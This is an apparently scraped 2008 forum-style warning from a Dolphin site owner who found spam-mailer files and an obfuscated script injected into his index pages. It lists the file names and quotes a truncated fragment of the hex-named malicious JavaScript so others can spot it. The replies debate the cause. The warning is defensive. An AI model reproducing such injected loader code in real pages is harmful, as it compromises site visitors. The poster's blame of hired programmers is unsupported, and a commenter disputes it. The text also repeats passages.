LOADING
Hacker Scammer on expertzzz
Product Details
Posted by:
Version:
1.0.0000
Tags:
scammer hacker
Compatible for:
Dolphin v.6.0
License:
GNU General Public License (GPL)
Price:
free
Created:
April 24, 2008 at 21:18
Avg. vote:
5.50
Product Description
Everyone search your server public folder and look for these files:
TEXT- config.txt,from.txt,letter.txt,mcaros1.txt,replyto.txt,subject.txt,
PHP,CGI-
emsconnect.php,dm.cgi,mm1.php,
THESE FILES ARE A RUSSIAN SCRIPT,THAT SENDS THOUSANDS OF EMAILS FROM YOUR SERVER,AND MAKES YOU LOOK LIKE A SPAMMER,AND GETS YOUR SITE SHUTDOWN
Now check all your index.php,index.html files, and look for this malicious script: ( check on the very bottom of these files,or at the beginning, it is a very long script,so its easy to spot)
function v4810bbc201043(v4810bbc201813){ return(parseInt(v4810bbc201813,16));}function v4810bbc202f83(v4810bbc203754){ var v4810bbc204ec2=2; var v4810bbc203f22='';for(v4810bbc2046f2=0; v4810bbc2046f2
Let me know if you have any of these files, maybe you can help me figure out what kind of lowlife does this to paying customers.Make no mistake about it, this was done by one of the top programmers on this site, because I hired only the best few people for my mods,just not sure if it was them directly,or maybe people they hired
TEXT- config.txt,from.txt,letter.txt,mcaros1.txt,replyto.txt,subject.txt,
PHP,CGI-
emsconnect.php,dm.cgi,mm1.php,
THESE FILES ARE A RUSSIAN SCRIPT,THAT SENDS THOUSANDS OF EMAILS FROM YOUR SERVER,AND MAKES YOU LOOK LIKE A SPAMMER,AND GETS YOUR SITE SHUTDOWN
Now check all your index.php,index.html files, and look for this malicious script: ( check on the very bottom of these files,or at the beginning, it is a very long script,so its easy to spot)
function v4810bbc201043(v4810bbc201813){ return(parseInt(v4810bbc201813,16));}function v4810bbc202f83(v4810bbc203754){ var v4810bbc204ec2=2; var v4810bbc203f22='';for(v4810bbc2046f2=0; v4810bbc2046f2
Let me know if you have any of these files, maybe you can help me figure out what kind of lowlife does this to paying customers.Make no mistake about it, this was done by one of the top programmers on this site, because I hired only the best few people for my mods,just not sure if it was them directly,or maybe people they hired
Comments
Customer
Comment
Vote
Posted
Playa,
I have just about decided it is a waste of breath to warn people here. I posted that fix for the "XSS" vulnerability that is in EVERY version of Dolphin yesterday and 8 people downloaded it!??
I have just about decided it is a waste of breath to warn people here. I posted that fix for the "XSS" vulnerability that is in EVERY version of Dolphin yesterday and 8 people downloaded it!??
10
April 25, 2008
so far so good not found any of these files or code, thanks for the warning
10
April 25, 2008
Hi playasurge,
It sounds to me like your problem is nothing to do with any of the people you hired but an XSS attack like mscott pointed out. If you say you hired the top programmers on expertz then I don't see why any of them would even bother to do this type of thing to you? I mean I am sure they have worked on 100's of servers before yours and none of the others seem to have any issues so why you?..
Sorry but for you to take the blame out on them is just not right. this type of hack could have been done externally and with out the need to access your ftp etc.. so I really don't think any of the top programmers would even bother with this type of thing.
It sounds to me like your problem is nothing to do with any of the people you hired but an XSS attack like mscott pointed out. If you say you hired the top programmers on expertz then I don't see why any of them would even bother to do this type of thing to you? I mean I am sure they have worked on 100's of servers before yours and none of the others seem to have any issues so why you?..
Sorry but for you to take the blame out on them is just not right. this type of hack could have been done externally and with out the need to access your ftp etc.. so I really don't think any of the top programmers would even bother with this type of thing.
1
April 25, 2008
Well... an XSS attack can't make your server sendmail, thats a php script function. And as far as files being saved and php scripts being modified by XSS - thats absurd. Yes, cookie values can be read and a whole bunch of other malicious things, but security itself inside of javascript disallows for most cross domain manipulation. Most XSS attacks rely on stealing user info and then hacking that account... I believe the above problem is something much, very much, different.
If you have a vps, did you disable the anonymous ftp account? Do you change passwords frequently. And, if you want to stop nearly ALL attacks, have a security expert install and configure mod_security for apache... makes xss and most other attacks impossible, if, configured properly.
If you have a vps, did you disable the anonymous ftp account? Do you change passwords frequently. And, if you want to stop nearly ALL attacks, have a security expert install and configure mod_security for apache... makes xss and most other attacks impossible, if, configured properly.
1
April 26, 2008
Contribute
Support Expertzzz.com and use a range of Contributor Benefits.
Support Expertzzz.com and use a range of Contributor Benefits.
Site-wide ad for $10/day. Order Now. 10 Spots Max, Random Positioning.
